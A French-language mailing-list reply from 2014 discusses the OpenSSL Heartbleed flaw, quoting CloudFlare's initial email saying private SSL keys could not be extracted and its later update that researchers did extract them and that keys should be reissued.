Re: Fwd: [HS] Faille "Heartbleed" d'Openssl
On 2014-04-12 10:51:57 +0200, Philippe Gras wrote:
> On dirait que le problème sur OpenSSL a aussi des répercussions sur les
> affaires…
>
> Début du message réexpédié :
>
> >De : CloudFlare Team <updates@cloudflare.com>
> >Date : 12 avril 2014 07:12:08 HAEC
> >À : <ph.gras@worldonline.fr>
> >Objet : Your website is secure from the OpenSSL Heartbleed vulnerability
> >Répondre à : <bounces-to@cloudflare.com>
[...]
> >PRIVATE KEY DATA. Our security and cryptographic team has been testing the
> >possibility that private SSL key data may have been retrieved. We have
> >been unable to replicate a situation where private SSL key data would
> >leak. We have set up a challenge to see if others can exploit the bug. See
> >more information on our blog:
> >
> >http://blog.cloudflare.com/answering-the-critical-question-can-you-get-private-ssl-keys-using-heartbleed
[...]
Mais depuis:
"Update:
Below is what we thought as of 12:27pm UTC. To verify our belief we
crowd sourced the investigation. It turns out we were wrong. While
it takes effort, it is possible to extract private SSL keys. The
challenge was solved by Software Engineer Fedor Indutny and Ilkka
Mattila at NCSC-FI roughly 9 hours after the challenge was first
published. Fedor sent 2.5 million requests over the course of the day
and Ilkka sent around 100K requests. Our recommendation based on this
finding is that everyone reissue and revoke their private keys.
CloudFlare has accelerated this effort on behalf of the customers
whose SSL keys we manage."
--
Vincent Lefèvre <vincent@vinc17.net> - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
Reply to: